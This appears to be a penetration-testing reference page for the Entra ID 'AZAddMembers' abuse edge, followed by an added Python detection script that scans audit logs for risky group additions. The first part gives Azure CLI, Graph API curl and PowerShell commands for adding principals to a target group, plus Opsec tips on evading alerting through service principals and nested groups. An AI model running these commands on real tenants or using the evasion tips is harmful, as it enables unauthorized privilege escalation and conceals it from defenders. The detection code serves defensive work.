AZAddMembers
The source principal can add any principal as a member of the target Entra ID group.
Applies to: User / ServicePrincipal / Group → AZGroup
Linux Abuse
Azure CLI
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
az ad group member add --group <target-group-id> --member-id <object-id>
Graph API (curl)
TOKEN=$(curl -s -X POST \
"https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
-d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
| jq -r '.access_token')
curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"
Windows Abuse
Microsoft.Graph PowerShell
Connect-MgGraph -AccessToken <access-token>
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>
AzureAD PowerShell (legacy)
Connect-AzureAD -AccountId <username> -AadAccessToken <access-token>
Add-AzureADGroupMember -ObjectId <target-group-id> -RefObjectId <object-id>
PowerZure
Add-AzureADGroup -User <target-user-upn> -Group '<group-display-name>'
Opsec
- The Entra ID audit log records the actor, the target group, the added principal, and the date/time.
- Use a service principal rather than an interactive user to reduce alerting.
- Adding an attacker-controlled SP to a privileged group (e.g. Global Admins) is high-signal; prefer adding to intermediate groups that inherit the target privilege.
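Defender-side counterpart to the Opsec notes above: an added detection example, not code from the original page, that scans an exported Entra ID audit log for successful "Add member to group" events and rates each one by the target group and by whether a service principal was involved on either side. It also covers the nested-group case from the last note by treating groups that are themselves nested inside a sensitive group as privileged. Assumptions: the record layout (activityDisplayName, initiatedBy.user/app, targetResources[].modifiedProperties carrying Group.ObjectID and Group.DisplayName) is a simplified version of the Graph directoryAudits shape and may need adapting to a real export; all group ids, object ids, names and log records are constructed placeholders.

```python
import json
from dataclasses import dataclass, field

# Constructed sample export (not real tenant data). The record layout is a
# simplified version of the Graph directoryAudits shape; that layout is an
# assumption, so adapt the accessors below to whatever your export contains.
def _event(ts, result, initiated_by, member_id, member_type, group_id, group_name):
    return {"activityDateTime": ts, "activityDisplayName": "Add member to group",
            "result": result, "initiatedBy": initiated_by,
            "targetResources": [{"id": member_id, "type": member_type, "modifiedProperties": [
                {"displayName": "Group.ObjectID", "newValue": json.dumps(group_id)},
                {"displayName": "Group.DisplayName", "newValue": json.dumps(group_name)}]}]}

def _user(upn): return {"user": {"userPrincipalName": upn}}
def _app(name, spid): return {"app": {"displayName": name, "servicePrincipalId": spid}}
G_LOW = "aaaaaaaa-0000-0000-0000-00000000000a"       # constructed placeholder ids
G_GA = "bbbbbbbb-0000-0000-0000-00000000000b"
G_NESTED = "cccccccc-0000-0000-0000-00000000000c"

SAMPLE_AUDIT_LOG = json.dumps([
    # interactive admin adds a user to an unremarkable group
    _event("2024-05-01T10:15:00Z", "success", _user("admin@contoso.example"),
           "11111111-0000-0000-0000-000000000001", "User", G_LOW, "Cafeteria Feedback"),
    # a service principal adds another service principal to a privileged group
    _event("2024-05-01T10:16:00Z", "success", _app("ci-deploy-bot", "22222222-0000-0000-0000-000000000002"),
           "22222222-0000-0000-0000-000000000009", "ServicePrincipal", G_GA, "Global Admins"),
    # a user lands in an intermediate group that is itself nested in the privileged one
    _event("2024-05-01T10:17:00Z", "success", _user("ops@contoso.example"),
           "11111111-0000-0000-0000-000000000003", "User", G_NESTED, "Tier-0 Ops"),
    # failed attempt: no membership changed, so analyze() skips it
    _event("2024-05-01T10:18:00Z", "failure", _user("ops@contoso.example"),
           "11111111-0000-0000-0000-000000000003", "User", G_GA, "Global Admins"),
])

# Placeholder inventories (constructed). In practice both come from the tenant: the
# sensitive groups, plus every group transitively nested inside one of them.
SENSITIVE_GROUPS = {G_GA: "Global Admins"}
NESTED_PRIVILEGED_GROUPS = {G_NESTED: "Tier-0 Ops (nested in Global Admins)"}

@dataclass
class Finding:
    timestamp: str
    actor: str
    actor_type: str
    member_id: str
    member_type: str
    group_name: str
    severity: str
    reasons: list = field(default_factory=list)

def _actor(event):
    """Return (name, kind) of the initiating principal; 'app' entries are service principals."""
    initiated = event.get("initiatedBy") or {}
    app = initiated.get("app")
    if app:
        return app.get("displayName") or app.get("servicePrincipalId", "?"), "ServicePrincipal"
    return (initiated.get("user") or {}).get("userPrincipalName", "?"), "User"

def _group_of(target):
    """Extract (group id, display name) from a member entry's Group.* modified properties."""
    gid = gname = None
    for prop in target.get("modifiedProperties", []):
        value = json.loads(prop.get("newValue") or "null")  # values arrive JSON-encoded
        if prop.get("displayName") == "Group.ObjectID":
            gid = value
        elif prop.get("displayName") == "Group.DisplayName":
            gname = value
    return gid, gname

def analyze(raw_json, sensitive=SENSITIVE_GROUPS, nested=NESTED_PRIVILEGED_GROUPS):
    """Turn successful 'Add member to group' records into severity-rated findings."""
    findings = []
    for event in json.loads(raw_json):
        if event.get("activityDisplayName") != "Add member to group" or event.get("result") != "success":
            continue  # other activities, or attempts that changed nothing
        actor, actor_type = _actor(event)
        for target in event.get("targetResources", []):
            gid, gname = _group_of(target)
            if gid is None:
                continue  # entries without Group.* properties describe the group itself, not the member
            reasons, severity = [], "low"
            if gid in sensitive:
                severity, gname = "high", sensitive[gid]
                reasons.append(f"target group is in the sensitive inventory: {gname}")
            elif gid in nested:
                severity, gname = "medium", nested[gid]
                reasons.append(f"target group inherits privilege through nesting: {gname}")
            member_type = target.get("type", "?")
            if actor_type == "ServicePrincipal":
                reasons.append("initiated by a service principal rather than an interactive user")
            if member_type == "ServicePrincipal":
                reasons.append("added member is a service principal")
            if severity == "low" and reasons:
                severity = "medium"  # non-interactive principals touching any group deserve a look
            findings.append(Finding(event.get("activityDateTime", "?"), actor, actor_type,
                                    target.get("id", "?"), member_type, gname or gid, severity, reasons))
    return findings
```

Run `analyze(SAMPLE_AUDIT_LOG)` to get three findings (low, high, medium); the failed attempt is dropped because no membership changed. The nested-group inventory is what makes the "intermediate group" route visible: without it, the third record would look like a routine addition. Keep that inventory derived from the tenant's actual transitive membership rather than from display names, since an attacker picks the group, not its label.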